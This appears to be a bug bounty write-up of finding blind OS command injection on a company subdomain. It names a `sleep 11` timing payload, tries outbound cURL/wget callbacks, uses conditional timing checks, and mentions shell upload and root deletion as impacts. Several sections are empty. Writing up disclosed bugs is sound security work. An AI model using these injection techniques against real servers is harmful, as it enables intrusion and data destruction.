Beyond the wall: command injection still alive.

Notes

  • I will change the name of the company I will talk about and call it Kings-Landing.
  • There is a short version of the story (TL;DR) & take away sections at the end of the write-up if you want to save yourself 7minutes || don’t have time for my jokes :)

HTTP history

After a couple of hours of hunting on the main domain of Kings-Landing didn’t reveal anything interesting, it was time for moving to the next sub-domain in the scope.

The response? 500 Internal Server Error

The error is gone and it’s 200 Ok again.

Active Scan++

False Positive everywhere!

but the Active Scan++ extension had another thought about that case.

This was the first time -since I install this extension several months ago- I see an output from it. and what makes it, even more, exciting is that I remembered installing it only after reading an article about a researcher found a $20,000 RCE by the active scan++.

The Payload was: `sleep 11`

OS Command Injection

This was the perfect time for the engaging of the super ultimate weapon any hacker has, Google search engine.

The best technique I found to exploit the vulnerability is by making the server send an out-bound by cURL or wget. unfortunately, the server or the Cloudflare didn’t allow any out-bound even the ping, and the nslookup didn’t work.

Conditional IF

I have a good server who seeps when I tell it to, and by measuring the response time; I can confirm the execution of the sleep command. and I want to execute other commands and confirm the execution. seems like the perfect time for the conditional IF statement.

And the server falls asleep.

The Real Impact

Now let’s do some series stuff, creating a file.

Reporting

At this point, my journey comes to its end. I wrote a detailed report
stated several ways a threat actor can use to compromise the whole back-end server, from uploading a bash shell to deleting the root directory.

Many scenarios, yet the end is the same. Dracarys.
Really?!!

TL;DR

This is the short version of the story:

Takeaways

Technical

  • Active Scan++ worth having it installed.
  • Automation is the key. Save your effort for the Logical bugs & investigating the weird behaviors reported by tools.
  • URL Encoding & double URL Encoding.
  • Tunnel vision is:

Follow Me

https://twitter.com/a_Constant_

A web developer & a Bug Hunter.